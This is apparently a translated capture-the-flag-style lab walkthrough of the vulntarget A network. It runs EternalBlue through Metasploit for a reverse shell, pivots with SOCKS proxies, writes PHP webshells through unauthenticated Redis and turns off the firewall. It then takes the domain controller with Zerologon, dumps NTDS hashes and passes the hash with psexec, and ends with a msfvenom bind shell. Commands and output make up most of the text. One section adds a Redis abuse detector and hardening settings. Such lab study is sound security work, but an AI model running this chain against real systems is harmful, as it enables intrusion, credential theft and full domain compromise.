Setup

Reference: https://www.cnblogs.com/backlion/p/16979674.html

External foothold

Host discovery

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap -sn 192.168.127.0/24
[sudo] password for mikannse:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 13:11 HKT
Nmap scan report for 192.168.127.1
Host is up (0.00069s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 192.168.127.3
Host is up (0.00052s latency).
MAC Address: 00:0C:29:B3:DB:08 (VMware)
Nmap scan report for 192.168.127.254
Host is up (0.0023s latency).
MAC Address: 00:50:56:F1:28:E7 (VMware)
Nmap scan report for 192.168.127.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.09 seconds

The target IP is 192.168.127.3.

Port scan

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ sudo ./fscan_386 -h 192.168.127.3
[sudo] password for mikannse:

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.127.3 is alive
[*] Icmp alive hosts len is: 1
192.168.127.3:135 open
192.168.127.3:445 open
192.168.127.3:139 open
192.168.127.3:80 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo:
[*]192.168.127.3
[->]win7-PC
[->]10.0.20.98
[->]192.168.127.3
[+] 192.168.127.3 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.127.3 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.127.3 [通达OA]
[+] http://192.168.127.3 tongda-user-session-disclosure
已完成 4/4
[*] 扫描结束,耗时: 8.185780028s

MS17_010

It is vulnerable to EternalBlue, so just run it through msf.

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name           Current Setting  Required  Description
----           ---------------  --------  -----------
RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT          445              yes       The target port (TCP)
SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass                         no        (Optional) The password for the specified username
SMBUser                         no        (Optional) The username to authenticate as
VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.233.6    yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port


Exploit target:

Id Name
-- ----
0 Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.127.3
rhosts => 192.168.127.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.127.4
lhost => 192.168.127.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.127.4:4444
[*] 192.168.127.3:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.127.3:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.127.3:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.127.3:445 - The target is vulnerable.
[*] 192.168.127.3:445 - Connecting to target for exploitation.
[+] 192.168.127.3:445 - Connection established for exploitation.
[+] 192.168.127.3:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.127.3:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.127.3:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.127.3:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.127.3:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.127.3:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.127.3:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.127.3:445 - Sending all but last fragment of exploit packet
[*] 192.168.127.3:445 - Starting non-paged pool grooming
[+] 192.168.127.3:445 - Sending SMBv2 buffers
[+] 192.168.127.3:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.127.3:445 - Sending final SMBv2 buffers.
[*] 192.168.127.3:445 - Sending last fragment of exploit packet!
[*] 192.168.127.3:445 - Receiving response from exploit packet
[+] 192.168.127.3:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.127.3:445 - Sending egg to corrupted connection.
[*] 192.168.127.3:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 192.168.127.3
[+] 192.168.127.3:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.127.3:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.127.3:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.127.4:4444 -> 192.168.127.3:49515) at 2024-11-20 13:19:51 +0800

meterpreter > sysinfo
Computer : WIN7-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows

Upload a copy of fscan.

meterpreter > upload fscan64.exe C:\\Windows\\Temp
[*] Uploading : /home/mikannse/vulntarget/a/fscan64.exe -> C:\Windows\Temp\fscan64.exe
[*] Completed : /home/mikannse/vulntarget/a/fscan64.exe -> C:\Windows\Temp\fscan64.exe

First fix the garbled Chinese output in the msf shell.

meterpreter > shell
Process 1012 created.
Channel 3 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID
=================== ========
nt authority\system S-1-5-18

We already have SYSTEM privileges.

There is a second network adapter.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter �������� 2:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::c43b:d6b:2f4f:6b6d%13
IPv4 Address. . . . . . . . . . . : 10.0.20.98
Subnet Mask . . . . . . . . . . . : 255.255.255.0

So run host discovery on that subnet; there is another host at .99.

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/arp_scanner
msf6 post(windows/gather/arp_scanner) > set session 1
session => 1
msf6 post(windows/gather/arp_scanner) > set rhosts 10.0.20.1-254
rhosts => 10.0.20.1-254
msf6 post(windows/gather/arp_scanner) > run

[*] Running module against WIN7-PC
[*] ARP Scanning 10.0.20.1-254
[+] IP: 10.0.20.1 MAC 00:50:56:c0:00:03 (VMware, Inc.)
[+] IP: 10.0.20.98 MAC 00:0c:29:b3:db:12 (VMware, Inc.)
[+] IP: 10.0.20.99 MAC 00:0c:29:49:db:32 (VMware, Inc.)
[+] IP: 10.0.20.254 MAC 00:50:56:ee:90:e7 (VMware, Inc.)
[*] Post module execution completed

Try the newer tool Stowaway for the proxy; start the admin (server) side first.

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ ./linux_x64_admin -l 9999

Upload an agent to the target and connect it back to the server.

C:\Windows\Temp>windows_x64_agent.exe -c 192.168.127.4:9999
windows_x64_agent.exe -c 192.168.127.4:9999
2024/11/20 13:57:39 [*] Starting agent node actively.Connecting to 192.168.127.4:9999

Open port 8888 locally as the SOCKS proxy.

[*] Waiting for new connection...
[*] Connection from node 192.168.127.3:50432 is set up successfully! Node id is 0
(admin) >> detail
Node[0] -> IP: 192.168.127.3:50432 Hostname: win7-PC User: nt authority\system
Memo:

(admin) >> use 0
(node 0) >> socks 8888
[*] Trying to listen on 0.0.0.0:8888......
[*] Waiting for agent's response......
[*] Socks start successfully!

After updating the proxychains config file to point at that port, traffic can be proxied.

Lateral movement

Start with a port scan. Scanning through a proxy like this is not very stable; across successive runs it turned up port 80 and port 6379.

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ proxychains nmap --min-rate=10000 -p- 10.0.20.99 -Pn
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 14:08 HKT
Nmap scan report for 10.0.20.99
Host is up (0.00092s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
6379/tcp open redis

Nmap done: 1 IP address (1 host up) scanned in 33.04 seconds

Scan the website's directories.

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ proxychains gobuster dir -u http://10.0.20.99/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,txt,zip,bak
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.20.99/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,zip,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 11]
/Index.php (Status: 200) [Size: 11]
/l.php (Status: 200) [Size: 14722]
/L.php (Status: 200) [Size: 14722]

Visiting l.php shows a PHP probe page, which reveals the site's absolute path: C:/phpStudy/PHPTutorial/WWW

Redis unauthenticated access

Redis also turns out to require no authentication.

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain ... 127.0.0.1:8888 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379>

So write a webshell through it.

10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW"
OK
10.0.20.99:6379> config set dbfilename shell.php
OK
10.0.20.99:6379> set test "<?php system($_GET['cmd']); ?>"
OK

It is running as SYSTEM again.

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ proxychains curl 'http://10.0.20.99/shell.php?cmd=whoami' --output res
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0[proxychains] Dynamic chain ... 127.0.0.1:8888 ... 10.0.20.99:80 ... OK
100 108 100 108 0 0 2336 0 --:--:-- --:--:-- --:--:-- 2347

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ cat res
REDIS0007� redis-ver3.2.100�
redis-bits�@�ctime��=gused-mem���testnt authority\system
��㋅����

Getting a beacon through two internal network layers

Connect with AntSword; remember to set the proxy.

10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/www/"
OK
10.0.20.99:6379> config set dbfilename shell1.php
OK
10.0.20.99:6379> set x "<?php @eval($_POST[0]);?>"
OK
10.0.20.99:6379> save
OK
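The sequence used above and again in this AntSword section (CONFIG SET dir to the web root, CONFIG SET dbfilename to a .php name, SET, SAVE) is the standard signature of an unauthenticated Redis instance being abused to drop a file. As an added defensive example that is not part of the original writeup, the following Python parses Redis MONITOR output, flags a client that rewires dir/dbfilename and then forces a dump, rates the hit by how suspicious the resulting path is, and lists the server-side settings that close this path; the MONITOR lines are constructed for the example.

```python
import re
import shlex
from collections import defaultdict

# Constructed Redis MONITOR output: <ts> [<db> <client>] "CMD" "arg" ...
# The last four lines mirror the webshell-drop sequence from the writeup.
SAMPLE_MONITOR = """\
1732082000.100 [0 10.0.20.98:51200] "PING"
1732082000.200 [0 10.0.20.98:51200] "SET" "counter" "1"
1732082010.000 [0 10.0.20.98:51210] "CONFIG" "SET" "dir" "C:/phpStudy/PHPTutorial/WWW"
1732082010.500 [0 10.0.20.98:51210] "CONFIG" "SET" "dbfilename" "shell.php"
1732082011.000 [0 10.0.20.98:51210] "SET" "test" "<?php system($_GET['cmd']); ?>"
1732082011.500 [0 10.0.20.98:51210] "SAVE"
"""

MONITOR_RE = re.compile(r"^(?P<ts>[\d.]+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.+)$")
SCRIPT_EXT = (".php", ".jsp", ".jspx", ".aspx", ".asp", ".sh", ".py")
SENSITIVE_DIRS = ("/www", "/htdocs", "/html", "/webapps", "/.ssh", "/cron")

def parse_monitor(text):
    """Yield (client, COMMAND, args) from MONITOR lines, skipping junk lines."""
    for line in text.splitlines():
        m = MONITOR_RE.match(line.strip())
        if not m:
            continue
        tokens = shlex.split(m.group("rest"))  # MONITOR double-quotes each token
        if tokens:
            yield m.group("client"), tokens[0].upper(), tokens[1:]

def path_reasons(directory, filename):
    """Why a dir/dbfilename pair looks like a file drop rather than a normal dump."""
    reasons = []
    if filename.lower().endswith(SCRIPT_EXT):
        reasons.append("script-extension")
    if any(mark in directory.lower() for mark in SENSITIVE_DIRS):
        reasons.append("sensitive-directory")
    return reasons

def detect_rdb_file_drop(text):
    """One finding per client that rewired dir/dbfilename and then forced a dump.
    Severity is "high" when the target path itself looks wrong, else "medium"."""
    pending = defaultdict(dict)  # client -> {"dir": ..., "dbfilename": ...}
    findings = []
    for client, cmd, args in parse_monitor(text):
        if cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET":
            if args[1].lower() in ("dir", "dbfilename"):
                pending[client][args[1].lower()] = args[2]
        elif cmd in ("SAVE", "BGSAVE") and pending.get(client):
            d = pending[client].get("dir", "<unchanged>")
            f = pending[client].get("dbfilename", "dump.rdb")
            reasons = path_reasons(d, f)
            findings.append({"client": client, "path": d.rstrip("/") + "/" + f,
                             "severity": "high" if reasons else "medium",
                             "reasons": reasons or ["config-set-then-save"]})
            pending.pop(client)
    return findings

# Server-side settings that close this path (the lab instance had none of them).
HARDENED_REDIS_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass <strong-random-password>
rename-command CONFIG ""
"""
```

Any CONFIG SET dbfilename followed by SAVE from a network client is worth an alert on its own; with the hardened settings above the CONFIG command is unreachable, so the sequence cannot occur.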

AntSword connects, but with two layers of internal network it is awkward to bring the host online directly, so try Cobalt Strike (CS) here.

After starting the client and the team server, bring the first host online, then right-click it to use it as a pivot and bring the second host online through forwarding.

Turn off the Windows firewall first, on both hosts:

netsh advfirewall set allprofiles state off

Then upload through AntSword; after triggering it, the host comes online. Running ipconfig shows another adapter with the address 10.0.10.111.

Upload fscan and scan; it finds a host at .110.

[11/20 20:57:16] [*] Tasked beacon to run: fscan64.exe -h 10.0.10.0/24
[11/20 20:57:16] [+] host called home, sent: 58 bytes
[11/20 20:57:26] [+] received output:

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 10.0.10.111 is alive
(icmp) Target 10.0.10.110 is alive
[*] Icmp alive hosts len is: 2
10.0.10.111:80 open
10.0.10.111:6379 open
10.0.10.111:445 open
10.0.10.111:139 open
10.0.10.110:135 open
10.0.10.111:135 open
10.0.10.110:88 open
10.0.10.110:445 open
10.0.10.110:139 open
[*] alive ports len is: 9
start vulscan
[*] NetBios: 10.0.10.110 [+]DC VULNTARGET\WIN2019
[*] NetInfo:
[*]10.0.10.111
[->]win2016
[->]10.0.20.99
[->]10.0.10.111
[*] WebTitle: http://10.0.10.111 code:200 len:11 title:None
[+] Redis:10.0.10.111:6379 unauthorized file:C:\Program Files\Redis/dump.rdb
[*] NetInfo:
[*]10.0.10.110
[->]win2019
[->]10.0.10.110

Port 88 is open, so this is a domain controller.

Zerologon

Try the Zerologon exploit, using: https://github.com/mstxq17/cve-2020-1472

┌──(mikannse㉿kali)-[~/tools/domain]
└─$ proxychains python zerologon.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
=[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK

Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Dump the domain database directly.

┌──(mikannse㉿kali)-[~/tools/domain]
└─$ proxychains secretsdump.py -just-dc -no-pass WIN2019\$@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:49673 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:0a5961f001aed3ef2370c4c6d6eb70e1:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:eed6593fd08413533507715bcbcaee6b29da1bb281c114168ef92bada53c1b10
WIN2016$:aes128-cts-hmac-sha1-96:99ea46f36ffdc46f7abfb2c1e742d2c6
WIN2016$:des-cbc-md5:94cbc4dcce8f348c
[*] Cleaning up...

Pass the hash to get administrator access.

┌──(mikannse㉿kali)-[~/tools/domain]
└─$ proxychains psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:445 ... OK
[*] Requesting shares on 10.0.10.110.....
[*] Found writable share ADMIN$
[*] Uploading file OfQCvEnM.exe
[*] Opening SVCManager on 10.0.10.110.....
[*] Creating service gIAt on 10.0.10.110.....
[*] Starting service gIAt.....
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:445 ... OK
[!] Press help for extra shell commands
[proxychains] Dynamic chain ... 127.0.0.1:1090 ... 10.0.10.110:445 ... OK
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.17763.107]

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) 2018 Microsoft Corporation����������Ȩ����


C:\Windows\system32> whoami
nt authority\system

Branch: using an MSF bind shell

Try it with an msf bind shell instead.

After the EternalBlue exploit, a route for the first host's other adapter can be added manually.

msf6 auxiliary(server/socks_proxy) > route add 10.0.20.0 255.255.255.0 1
[*] Route added
msf6 auxiliary(server/socks_proxy) > route print

IPv4 Active Routing Table
=========================

Subnet     Netmask        Gateway
------     -------        -------
10.0.20.0  255.255.255.0  Session 1

[*] There are currently no IPv6 routes defined.

Then use auxiliary/server/socks_proxy to start the proxy.

Host liveness discovery

msf6 auxiliary(server/socks_proxy) > use post/windows/gather/arp_scanner
msf6 post(windows/gather/arp_scanner) > set session 1
session => 1
msf6 post(windows/gather/arp_scanner) > set rhosts 10.0.20.1-254
rhosts => 10.0.20.1-254
msf6 post(windows/gather/arp_scanner) > run

[*] Running module against WIN7-PC
[*] ARP Scanning 10.0.20.1-254
[+] IP: 10.0.20.1 MAC 00:50:56:c0:00:03 (VMware, Inc.)
[+] IP: 10.0.20.98 MAC 00:0c:29:b3:db:12 (VMware, Inc.)
[+] IP: 10.0.20.99 MAC 00:0c:29:49:db:32 (VMware, Inc.)
[+] IP: 10.0.20.254 MAC 00:50:56:ee:90:e7 (VMware, Inc.)
[*] Post module execution completed

Port scanning can be done with use auxiliary/scanner/portscan/tcp.

Generate a bind-shell payload and upload it via AntSword.

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes

Then set payload, rhosts and lport to get the bind shell.

Rambling

My first vulntarget box; it took quite a while, being a multi-layer internal network environment. CS is still the easier tool to use.